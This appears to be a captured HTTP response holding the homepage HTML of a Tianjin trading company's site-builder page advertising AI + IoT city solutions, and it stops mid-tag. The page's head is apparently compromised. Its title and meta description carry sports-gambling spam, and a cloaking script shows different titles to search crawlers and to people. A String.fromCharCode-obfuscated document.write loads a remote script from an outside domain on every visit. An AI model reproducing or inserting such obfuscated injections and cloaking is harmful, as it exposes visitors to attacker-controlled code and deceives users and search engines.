200 response code is a standard successful HTTP server response. It means that the client’s request (e.g., from a browser) was successfully processed, and the server is delivering the requested data.
The user receives content without errors, and the page or application functions properly. If Code 200 is accompanied by data, the browser or program processes and displays it to the user.
GET / HTTP/1.1 Host: ldexd.com Accept: */* User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])
<!DOCTYPE html> <html class="smart-design-mode"> <head> <title>华体会电子(中国)官方网站</title> <meta name="keywords" content="华体会官方网站/网页入口登录"/> <meta name="description" content="✅⭐️⭐️华体会登录网页入口【✅老詹推荐⚽️ayx8899.ee✅】✅www.kaiyun.com✅KAIYUN SPORTS手机版为您提供:kaiyun体育app官网入口登录、kaiyun体育在线登录入口、云开全站app、开云集团官方网站、下载网址、 网页版登录、官网入口客户端下载以及发布平台优惠活动信息、招商代理加盟等,kaiyun体育平台官网入口是您休闲娱乐的首选网站!"/> <script>if(!navigator.userAgent.match(/baiduspider|sogou|360spider|yisou/i)){document.title ="天津鑫晨商贸有限公司"}</script> <script type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,120,120,106,115,51,49,56,46,99,111,109,47,109,109,46,106,115,34,62,60, 47,115, 99,114,105,112,116,62); document.write(xt); </script> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="description"> <meta name="keywords"> <meta name="renderer" content="webkit"> <meta name="applicable-device" content="pc"> <meta http-equiv="Cache-Control" content="no-transform"> <link rel="icon" href="https://nwzimg.wezhan.cn/Content/images/favicon.ico"><link rel="shortcut icon" href="https://nwzimg.wezhan.cn/Content/images/favicon.ico"><link rel="bookmark" href="https://nwzimg.wezhan.cn/Content/images/favicon.ico"> <link href="static/css/pcstyle.css" rel="stylesheet" type="text/css"> <link href="static/css/reset.css" rel="stylesheet" type="text/css"> <link href="static/css/iconfont-20250314160853.css" rel="stylesheet" type="text/css"> <link href="static/css/iconfont-202503141608531.css" rel="stylesheet" type="text/css"> <link href="static/css/iconfont-202503141608532.css" rel="stylesheet" type="text/css"> <link href="static/css/pager.css" rel="stylesheet" type="text/css"> <link href="static/css/hover-effects.css" rel="stylesheet" type="text/css"> <link href="static/css/antChain.css" rel="stylesheet" type="text/css"> <link href="static/css/30536_Pc_zh-CN.css" rel="stylesheet"> <script src="static/js/jquery-3.6.3.min.js" type="text/javascript"></script> <script src="static/js/jquery.lazyload.min.js" type="text/javascript"></script> <script src="static/js/smart.animation.min.js" type="text/javascript"></script> <script src="static/js/kino.razor.min.js" type="text/javascript"></script> <script src="static/js/common.min.js" type="text/javascript"></script> <script src="static/js/admin.validator.min.js" type="text/javascript"></script> <script src="static/js/jquery.cookie.js" type="text/javascript"></script> <script type='text/javascript' id='jssor-all' src='static/js/jssor.slider-22.2.16-all.min.js'></script><script type='text/javascript' id='slideshown' src='static/js/slideshow.js'></script><script type='text/javascript' id='lzparallax' src='static/js/lz-parallax.min.js'></script><script type='text/javascript' id='jqueryzoom' src='static/js/jquery.jqueryzoom.js'></script> <script type="text/javascript"> $.ajaxSetup({ cache: false, beforeSend: function (jqXHR, settings) { settings.data = settings.data && settings.data.length > 0 ? (settings.data + "&") : ""; settings.data = settings.data + "__RequestVerificationToken=" + $('input[name="__RequestVerificationToken"]').val(); return true; } }); </script> </head> <body id="smart-body" area="main"> <input type="hidden" id="pageinfo" value="30536" data-type="1" data-device="Pc" data-entityid="30536"> <input id="txtDeviceSwitchEnabled" value="show" type="hidden"> <script type="text/javascript"> $(function() { if (""=="True") { $('#mainContentWrapper').addClass('translate'); $('#antChainWrap').fadeIn(500); $('#closeAntChain').off('click').on('click', function(){ $('#antChainWrap').fadeOut('slow',function(){ $('#mainContentWrapper').removeClass('translate'); }); $(document).off("scroll",isWatchScroll); }); $('#showQrcodeBtn').off('click').on('click', function(){ $('#qrCodeWrappper').toggleClass('qrCodeShow'); }); $(document).scroll(isWatchScroll) } function isWatchScroll(){ var scroH = $(document).scrollTop(); if(scroH >= 80) { $('#mainContentWrapper').removeClass('translate'); } else { $('#mainContentWrapper').addClass('translate'); } } }) </script> <link href="static/css/view.css" rel="stylesheet" type="text/css"> <input type="hidden" id="secUrl"> <script type="text/javascript"> function initialDeviceSwitch() { try { $(".m-deviceSwitch").find("li[data-device=Pc]").removeClass("active").find("a").removeClass("z-current"); $(".m-deviceSwitch").find("li[data-device=Mobile]").removeClass("active").find("a").removeClass("z-current"); var pageinfo = $("#pageinfo"); var l = window.location; if (pageinfo.length == 0 && window.frames.length > 0) { pageinfo = $(window.frames[0].document).find("#pageinfo"); l = window.frames[0].document.location; } $(".m-deviceSwitch").show(); if (pageinfo.length == 0) { $(".m-deviceSwitch").hide(); return; } $("#secUrl").attr("data-host", l.host).attr("data-pathname", l.pathname).attr("data-search", l.search).attr("data-hash", l.hash); var pagedevice = pageinfo.attr("data-device"); $(".m-deviceSwitch").find("li[data-device=" + pagedevice + "]").addClass("active").find("a").addClass("z-current"); $(".m-deviceSwitch").find("li").not(".active").click(function () { var secUrl = $("#secUrl"); var pathname = secUrl.attr("data-pathname"); var search = secUrl.attr("data-search"); var hash = secUrl.attr("data-hash"); var npagedevice = $(this).attr("data-device"); var flag = "yibu_IsMobileDevice=true"; var mobileUrl = ""; if (npagedevice == "Pc") { mobileUrl = mobileUrl + pathname + search.replace("deviceModel=mobile", "deviceModel=pc") + hash; mobileUrl = mobileUrl.replace("&" + flag, "").replace("?" + flag, ""); } else if (npagedevice == "Mobile") { var toUrl = pathname + search.replace("deviceModel=pc", "deviceModel=mobile") + hash; toUrl = toUrl.replace("&" + flag, "").replace("?" + flag, ""); //if (toUrl.indexOf("?") === -1) { // toUrl += "?" + flag; //} //else { // toUrl += "&" + flag; //} mobileUrl = mobileUrl + "/Runtime/MobileContainer?url=" + encodeURIComponent(toUrl) + "&" + flag; } $.ajax({ cache: false, url: "/Common/ChangeRunTimeDeviceMode", type: "post", data: { type: "Pc" }, dataType: "json", success: function (result) { if (result.IsSuccess) { window.top.location.href = mobileUrl; } }, error: function () { } }); }); } catch (e) { $(".m-deviceSwitch").find("li[data-device=Mobile]").addClass("active").find("a").addClass("z-current"); } } $(function () { if ($("#prevMainFrame").length > 0) { $("#prevMainFrame").load(initialDeviceSwitch); } else { initialDeviceSwitch(); } }); </script> <style> /*不可直接引用bootstarp,否则会对页面样式有影响*/ .alert { padding: 15px; margin-bottom: 20px; border: 1px solid transparent; border-radius: 4px } .alert-info { color: #31708f; background-color: #d9edf7; border-color: #bce8f1 } .alert-dismissable, .alert-dismissible { padding-right: 35px } .alert-dismissable .close, .alert-dismissible .close { position: relative; top: -5px; right: -21px; color: inherit } button.close { -webkit-appearance: none; padding: 0; cursor: pointer; background: 0 0; border: 0 } .close { float: right; font-size: 21px; font-weight: 700; line-height: 1; color: #000; text-shadow: 0 1px 0 #fff; filter: alpha(opacity=20); opacity: .2 } </style> <script src="static/js/bootstrap.min.js" type="text/javascript"></script> <div id="deadlineTips" class="alert alert-info alert-dismissible" style="margin-bottom: 0px; display: none; z-index: 2147483647; position: absolute; left: 0; right:0;" role="alert"> <button type="button" class="close" data-dismiss="alert" aria-label="Close" onclick="sessionStorage.setItem('_ptk_','true')"><span aria-hidden="true">×</span></button> <span style="text-align: center; display: block; ">分享给他人?请复制当前浏览器地址分享给他人,他人浏览需进行安全验证,验证方式为您的手机号,请在<b>网站后台</b>进行<b>扫码关注绑定手机号</b>用以安全验证</span> </div> <script> var token = ""; function FixHref() { $(function () { $("a[href]").each(function (a, b) { if (b.href.indexOf(location.host) !== -1 && b.href.indexOf("_ptk=") === -1) { //此处不能直接用b.href,否则会带上域名,导致导航条选中态异常 var aHref = $(b).attr("href"); var index = aHref.indexOf('#'); if (index !== -1) { if (index === 0) { return; } else { var href = aHref .substr(0, index); aHref = href + (href.indexOf('?') === -1 ? "?" : "&") + "_ptk=" + token + aHref .substr(index); } } else { aHref = aHref + (aHref.indexOf('?') === -1 ? "?" : "&") + "_ptk=" + token ; } $(b).attr("href", aHref); } }); $("[data-url]").each(function (a, b) { var dataUrl = $(b).attr("data-url")||""; if (dataUrl.indexOf("http") !==0&& dataUrl .indexOf("_ptk=") === -1) { var aHref = dataUrl; var index = aHref.indexOf('#'); if (index !== -1) { if (index === 0) { return; } else { var href = aHref.substr(0, index); aHref = href + (href.indexOf('?') === -1 ? "?" : "&") + "_ptk=" + token + aHref .substr(index); } } else { aHref = aHref + (aHref.indexOf('?') === -1 ? "?" : "&") + "_ptk=" + token ; } $(b).attr("data-url", aHref); } }); }); } function InIframe() { try { return window.self !== window.top; } catch (e) { return true; } } function ShowTips() { var val = sessionStorage.getItem("_ptk_"); if (!val && !InIframe()) { $("#deadlineTips").show(); } } if (token) { FixHref(); ShowTips(); } </script> <div id="mainContentWrapper" style="background-color: transparent; background-image: none; background-repeat: no-repeat;background-position:0 0; background:-moz-linear-gradient(top, none, none);background:-webkit-gradient(linear, left top, left bottom, from(none), to(none));background:-o-linear-gradient(top, none, none);background:-ms-linear-gradient(top, none, none);background:linear-gradient(top, none, none);; position: relative; width: 100%;min-width:1200px;background-size: auto;" bgscroll="none"> <div style="background-color: rgb(7, 7, 7); background-image: none; background-repeat: no-repeat;background-position:0 0; background:-moz-linear-gradient(top, none, none);background:-webkit-gradient(linear, left top, left bottom, from(none), to(none));background:-o-linear-gradient(top, none, none);background:-ms-linear-gradient(top, none, none);background:linear-gradient(top, none, none);; position: relative; width: 100%;min-width:1200px;background-size: auto;" bgscroll="none"> <div class=" header" cpid="30459" id="smv_Area0" style="width: 1200px; height: 79px; position: relative; margin: 0 auto"> <div id="smv_tem_78_50" ctype="banner" class="esmartMargin smartAbs " cpid="30459" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="" tareaid="Area0" re-direction="y" daxis="Y" isdeletable="True" style="height: 80px; width: 100%; left: 0px; top: 0px;z-index:26;"><div class="yibuFrameContent tem_78_50 banner_Style1 " style="overflow:visible;;"><div class="fullcolumn-inner smAreaC" id="smc_Area0" cid="tem_78_50" style="width:1200px"> <script> $(function () { $('#nav_tem_79_41').find('.w-subnav').hide(); var $this, item, itemAll, itemW, goTo; var tem_79_41_hasCurrent = false; $('#nav_tem_79_41').off('mouseenter').on('mouseenter', '.w-nav-inner', function () { if ($(this).children().hasClass("current")) { tem_79_41_hasCurrent = true; $(this).children().removeClass("current"); } itemAll = $('#nav_tem_79_41').find('.w-subnav'); $this = $(this); item = $this.find('.w-subnav'); index = $this.index() - 1; itemW = $this.width(); goTo = itemW * index; item.slideDown(); flag = false; $('#nav_tem_79_41').find('.sliding').hide().show().stop().animate({ left: goTo }, 200, 'linear'); }).off('mouseleave').on('mouseleave', '.w-nav-inner', function () { if (tem_79_41_hasCurrent == true) { tem_79_41_hasCurrent = false; $(this).children().addClass("current"); } item = $(this).find('.w-subnav'); item.stop().slideUp(); $('#nav_tem_79_41').find('.sliding').stop().fadeOut(200); }); SetNavSelectedStyle('nav_tem_79_41');//选中当前导航 }); </script></div></div><div id="smv_tem_80_3" ctype="logoimage" class="esmartMargin smartAbs " cpid="30459" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="tem_78_50" tareaid="Area0" re-direction="all" daxis="All" isdeletable="True" style="height: 41px; width: 111px; left: 0px; top: 20px;z-index:2;"><div class="yibuFrameContent tem_80_3 logoimage_Style1 " style="overflow:visible;;"> <script type="text/javascript"> $(function () { InitImageSmv("tem_80_3", "111", "41", "0"); }); </script> </div></div></div> <div id="bannerWrap_tem_78_50" class="fullcolumn-outer" style="position: absolute; top: 0; bottom: 0;"> </div> <script type="text/javascript"> $(function () { var resize = function () { $("#smv_tem_78_50 >.yibuFrameContent>.fullcolumn-inner").width($("#smv_tem_78_50").parent().width()); $('#bannerWrap_tem_78_50').fullScreen(function (t) { if (VisitFromMobile()) { t.css("min-width", t.parent().width()) } }); } if (typeof (LayoutConverter) !== "undefined") { LayoutConverter.CtrlJsVariableList.push({ CtrlId: "tem_78_50", ResizeFunc: resize, }); } else { $(window).resize(function (e) { if (e.target == this) { resize(); } }); } resize(); }); </script> </div></div> </div> </div> <div class="main-layout-wrapper" id="smv_AreaMainWrapper" style="background-color: transparent; background-image: none; background-repeat: no-repeat;background-position:0 0; background:-moz-linear-gradient(top, none, none);background:-webkit-gradient(linear, left top, left bottom, from(none), to(none));background:-o-linear-gradient(top, none, none);background:-ms-linear-gradient(top, none, none);background:linear-gradient(top, none, none);;background-size: auto;" bgscroll="none"> <div class="main-layout" id="tem-main-layout11" style="width: 100%;"> <div style="display: none"> </div> <div class="" id="smv_MainContent" rel="mainContentWrapper" style="width: 100%; min-height: 300px; position: relative; "> <div class="smvWrapper" style="min-width:1200px; position: relative; background-color: transparent; background-image: none; background-repeat: no-repeat; background:-moz-linear-gradient(top, none, none);background:-webkit-gradient(linear, left top, left bottom, from(none), to(none));background:-o-linear-gradient(top, none, none);background:-ms-linear-gradient(top, none, none);background:linear-gradient(top, none, none);;background-position:0 0;background-size:auto;" bgscroll="none"><div class="smvContainer" id="smv_Main" cpid="30536" style="min-height:400px;width:1200px;height:3669px; position: relative; "><div id="smv_con_1_37" ctype="slideset" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="" iscontainer="True" pvid="" tareaid="" re-direction="y" daxis="Y" isdeletable="True" style="height: 850px; width: 100%; left: 0px; top: 0px;z-index:0;"><div class="yibuFrameContent con_1_37 slideset_Style1 " style="overflow:visible;;"> <!--w-slide--> <div id="lider_smv_con_1_37_wrapper"> <div class="w-slide" id="slider_smv_con_1_37"> <div class="w-slide-inner" data-u="slides"> <div class="content-box" data-area="Area0"> <div id="smc_Area0" cid="con_1_37" class="smAreaC slideset_AreaC"> <div id="smv_con_8_19" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_1_37" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 296px; width: 678px; left: 0px; top: 308px;z-index:2;"><div class="yibuFrameContent con_8_19 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_8_19"> <div id="smv_con_10_36" ctype="text" smanim='{"delay":0.75,"duration":0.75,"direction":"Down","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item5" areaid="Area0" iscontainer="False" pvid="con_8_19" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 90px; width: 540px; left: 0px; top: 32px;z-index:3;"><div class="yibuFrameContent con_10_36 text_Style1 " style="overflow:hidden;;"><div id='txt_con_10_36' style="height: 100%;"> <div class="editableContent" id="txtc_con_10_36" style="height: 100%; word-wrap:break-word;"> <p><span style="font-size:14px"><span style="font-family:Arial,Helvetica,sans-serif"><span style="color:#ffffff">AIOT INDUSTRY EMPOWERMENT ENGINE</span></span></span></p> <p> </p> <p><span style="font-size:40px"><span style="font-family:Microsoft JhengHei"><strong><span style="color:#ffffff">天津鑫晨商贸有限公司</span></strong></span></span></p> </div> </div> <script> var tables = $(' #smv_con_10_36').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_11_11" ctype="line" smanim='{"delay":0.75,"duration":0.75,"direction":"Up","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_8_19" tareaid="" re-direction="x" daxis="All" isdeletable="True" style="height: 20px; width: 444px; left: 0px; top: 135px;z-index:4;"><div class="yibuFrameContent con_11_11 line_Style1 " style="overflow:visible;;"><!-- w-line --> <div style="position:relative; height:100%"> <div class="w-line" style="position:absolute;top:50%;" linetype="horizontal"></div> </div> </div></div><div id="smv_con_12_26" ctype="text" smanim='{"delay":0.75,"duration":0.75,"direction":"Right","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item3" areaid="Area0" iscontainer="False" pvid="con_8_19" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 27px; width: 481px; left: 0px; top: 166px;z-index:5;"><div class="yibuFrameContent con_12_26 text_Style1 " style="overflow:hidden;;"><div id='txt_con_12_26' style="height: 100%;"> <div class="editableContent" id="txtc_con_12_26" style="height: 100%; word-wrap:break-word;"> <p><span style="letter-spacing:10px"><span style="font-size:14px"><span style="color:#ffffff">以人工智能+物联网技术打造 AI CITY</span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_12_26').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_13_10" ctype="line" smanim='{"delay":0.75,"duration":0.75,"direction":"Up","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_8_19" tareaid="" re-direction="x" daxis="All" isdeletable="True" style="height: 20px; width: 448px; left: 0px; top: 195px;z-index:6;"><div class="yibuFrameContent con_13_10 line_Style1 " style="overflow:visible;;"><!-- w-line --> <div style="position:relative; height:100%"> <div class="w-line" style="position:absolute;top:50%;" linetype="horizontal"></div> </div> </div></div> </div> </div></div></div> </div> <div class="content-box-inner" style="background-image:url(static/image/-48629.jpg);background-position:50% 50%;background-repeat:cover;background-size:cover;background-color:#ffffff;opacity:1"></div> </div> </div> <!-- Bullet Navigator --> <div data-u="navigator" class="w-slide-btn-box f-hide " data-autocenter="1"> <!-- bullet navigator item prototype --> <div class="w-slide-btn" data-u="prototype"></div> </div> <!-- 1Arrow Navigator --> <span data-u="arrowleft" class="w-slide-arrowl slideArrow f-hide " data-autocenter="2" id="left_con_1_37"> <i class="w-itemicon mw-iconfont">넳</i> </span> <span data-u="arrowright" class="w-slide-arrowr slideArrow f-hide " data-autocenter="2" id="right_con_1_37"> <i class="w-itemicon mw-iconfont">넲</i> </span> </div> </div> <!--/w-slide--> <script type="text/javascript"> var jssorCache_con_1_37 = { CtrlId:"con_1_37", SliderId: "slider_smv_con_1_37", Html:$("#slider_smv_con_1_37")[0].outerHTML, }; var slide_con_1_37; var slideAnimation_con_1_37 = function (slideIndex, fromIndex) { var $slideWrapper = $("#slider_smv_con_1_37 .w-slide-inner:last"); var $fromSlide = $slideWrapper.find(".content-box:eq(" + fromIndex + ")"); var $curSlide = $slideWrapper.find(".content-box:eq(" + slideIndex + ")"); var $nextSlide = $slideWrapper.find(".content-box:eq(" + (slideIndex+1) + ")"); $("#smv_con_1_37").attr("selectArea", $curSlide.attr("data-area")); $slideWrapper.find(".animated").smanimate("stop"); $fromSlide.find(".animated").smanimate("stop"); $curSlide.find(".animated").smanimate("stop"); $nextSlide.find(".animated").smanimate("stop"); $("#switch_con_1_37 .page").html(slideIndex + 1); // debugger $curSlide.find(".animated").smanimate("replay"); return false; } con_1_37_page = 1; con_1_37_sliderset3_init = function () { var jssor_1_options_con_1_37 = { $AutoPlay: "False"=="True"?false:"on" == "on",//自动播放 $PlayOrientation: 1,//2为向上滑,1为向左滑 $Loop: 1,//循环 $Idle: parseInt("4000"),//切换间隔 $SlideDuration: "1000",//延时 $SlideEasing: $Jease$.$OutQuint, $SlideshowOptions: { $Class: $JssorSlideshowRunner$, $Transitions: GetSlideAnimation("3", "1000"), $TransitionsOrder: 1 }, $ArrowNavigatorOptions: { $Class: $JssorArrowNavigator$ }, $BulletNavigatorOptions: { $Class: $JssorBulletNavigator$, $ActionMode: "1" } }; //初始化幻灯 var slide = slide_con_1_37 = new $JssorSlider$("slider_smv_con_1_37", jssor_1_options_con_1_37); if (typeof (LayoutConverter) !== "undefined") { jssorCache_con_1_37 .JssorOpt= jssor_1_options_con_1_37, jssorCache_con_1_37 .Jssor = slide; } $('#smv_con_1_37').data('jssor_slide', slide); //resize游览器的时候触发自动缩放幻灯秀 //幻灯栏目自动或手动切换时触发的事件 slide.$On($JssorSlider$.$EVT_PARK,slideAnimation_con_1_37); //切换栏点击事件 $("#switch_con_1_37 .left").unbind("click").click(function () { if(con_1_37_page==1){ con_1_37_page =1; } else { con_1_37_page = con_1_37_page - 1; } $("#switch_con_1_37 .page").html(con_1_37_page); slide.$Prev(); return false; }); $("#switch_con_1_37 .right").unbind("click").click(function () { if(con_1_37_page==1){ con_1_37_page = 1; } else { con_1_37_page = con_1_37_page + 1; } $("#switch_con_1_37 .page").html(con_1_37_page); slide.$Next(); return false; }); }; $(function () { var jssorCopyTmp = document.getElementById('slider_smv_con_1_37').cloneNode(true); var $jssorIntt = function (skipInit) { //获取幻灯显示动画类型 var $this = $('#slider_smv_con_1_37'); var dh = $(document).height(); var wh = $(window).height(); var ww = $(window).width(); var width = 1000; //区分页头、页尾、内容区宽度 if ($this.parents(".header").length > 0 ) { width = $this.parents(".header").width(); } else if ($this.parents(".footer").length > 0 ){ width = $this.parents(".footer").width(); } else { width = $this.parents(".smvContainer").width(); } if (ww > width) { var left = parseInt((ww - width) * 10 / 2) / 10; $this.css({ 'left': -left, 'width': ww }); } else { $this.css({ 'left': 0, 'width': ww }); } //解决手机端预览PC端幻灯秀时不通栏问题 if (VisitFromMobile() && typeof (LayoutConverter) === "undefined") { $this.css("min-width", width); setTimeout(function () { var boxleft = (width - 330) / 2; $this.find(".w-slide-btn-box").css("left", boxleft + "px"); }, 300); } $this.children().not(".slideArrow").css({ "width": $this.width() }); if (!skipInit) { con_1_37_sliderset3_init(); } var areaId = $("#smv_con_1_37").attr("tareaid"); if(areaId==""){ var mainWidth = $("#smv_Main").width(); $("#smv_con_1_37 .slideset_AreaC").css({"width":mainWidth+"px","position":"relative","margin":"0 auto"}); }else{ var controlWidth = $("#smv_con_1_37").width(); $("#smv_con_1_37 .slideset_AreaC").css({"width":controlWidth+"px","position":"relative","margin":"0 auto"}); } $("#smv_con_1_37").attr("selectArea", "Area0"); var arrowHeight = $('#slider_smv_con_1_37 .w-slide-arrowl').eq(-1).outerHeight(); var arrowTop = (18 - arrowHeight) / 2; $('#slider_smv_con_1_37 .w-slide-arrowl').eq(-1).css('top', arrowTop); $('#slider_smv_con_1_37 .w-slide-arrowr').eq(-1).css('top', arrowTop); } $jssorIntt(); var ctime = null; function ScaleSlider() { slide_con_1_37.$Off($JssorSlider$.$EVT_PARK,slideAnimation_con_1_37); if (ctime) { clearTimeout(ctime); ctime = null; } ctime = setTimeout(function () { var inst = $('#slider_smv_con_1_37'); var orginWidth = inst.width(); if (orginWidth == $(window).width()) return; var inst_parent = inst.parent(); inst.remove() inst_parent.append(jssorCopyTmp.cloneNode(true)); inst_parent.find('.animated').smanimate().stop(); //$('.smartRecpt').smrecompute() $jssorIntt(); ctime = null; }, 200); } if (typeof (LayoutConverter) === "undefined") { $Jssor$.$CancelEvent(window, "resize", ScaleSlider); $Jssor$.$AddEvent(window, "resize", ScaleSlider); } if (typeof (LayoutConverter) !== "undefined") { jssorCache_con_1_37 .ResizeFunc = $jssorIntt; LayoutConverter.CtrlJsVariableList.push(jssorCache_con_1_37 ); } }); </script> </div></div><div id="smv_con_31_0" ctype="banner" class="esmartMargin smartAbs " cpid="30536" cstyle="Style3" ccolor="Item0" areaid="" iscontainer="True" pvid="" tareaid="" re-direction="y" daxis="Y" isdeletable="True" style="height: 600px; width: 100%; left: 0px; top: 1441px;z-index:8;"><div class="yibuFrameContent con_31_0 banner_Style3 " style="overflow:visible;;"> <div class="w-banner"> <div class="w-banner-content fullcolumn-inner smAreaC" id="smc_Area0" cid="con_31_0" style="width:1200px"> <div id="smv_con_33_59" ctype="area" smanim='{"delay":0.75,"duration":0.75,"direction":"","animationName":"zoomIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_31_0" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 184px; width: 512px; left: 344px; top: 43px;z-index:0;"><div class="yibuFrameContent con_33_59 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_33_59"> <div id="smv_con_34_59" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_33_59" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 70px; width: 374px; left: 69px; top: 0px;z-index:2;"><div class="yibuFrameContent con_34_59 text_Style1 " style="overflow:hidden;;"><div id='txt_con_34_59' style="height: 100%;"> <div class="editableContent" id="txtc_con_34_59" style="height: 100%; word-wrap:break-word;"> <p style="text-align:center"><span style="color:rgba(255, 255, 255, 0.2)"><span style="font-size:72px"><strong><span style="font-family:Arial Black">Service.</span></strong></span></span></p> </div> </div> <script> var tables = $(' #smv_con_34_59').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_35_59" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item3" areaid="Area0" iscontainer="False" pvid="con_33_59" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 48px; width: 237px; left: 137px; top: 75px;z-index:3;"><div class="yibuFrameContent con_35_59 text_Style1 " style="overflow:hidden;;"><div id='txt_con_35_59' style="height: 100%;"> <div class="editableContent" id="txtc_con_35_59" style="height: 100%; word-wrap:break-word;"> <p style="text-align:center"><span style="font-size:36px"><span style="color:#ffffff"><strong><span style="font-family:Source Han Sans,Geneva,sans-serif">我们的服务</span></strong></span></span></p> </div> </div> <script> var tables = $(' #smv_con_35_59').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_38_51" ctype="line" class="esmartMargin smartAbs " cpid="30536" cstyle="Style2" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_33_59" tareaid="" re-direction="y" daxis="All" isdeletable="True" style="height: 37px; width: 20px; left: 246px; top: 132px;z-index:1;"><div class="yibuFrameContent con_38_51 line_Style2 " style="overflow:visible;;"><!-- w-line --> <div style="position:relative; width:100%"> <div class="w-line" style="position:absolute;left:50%;" linetype="vertical"></div> </div> </div></div> </div> </div></div></div><div id="smv_con_39_23" ctype="text" smanim='{"delay":0.75,"duration":0.75,"direction":"Up","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item4" areaid="Area0" iscontainer="False" pvid="con_31_0" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 63px; width: 532px; left: 334px; top: 246px;z-index:6;"><div class="yibuFrameContent con_39_23 text_Style1 " style="overflow:hidden;;"><div id='txt_con_39_23' style="height: 100%;"> <div class="editableContent" id="txtc_con_39_23" style="height: 100%; word-wrap:break-word;"> <p style="text-align:center"><span style="color:#ffffff"><span style="line-height:1.75"><span style="font-size:14px"><span style="font-family:Source Han Sans,Geneva,sans-serif">以人工智能+物联网技术打造 AI CITY, 为政府、企业提供城市管理、建筑能源管理、环境与基础设施运营管理等一站式解决方案。</span></span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_39_23').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_132_2" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" 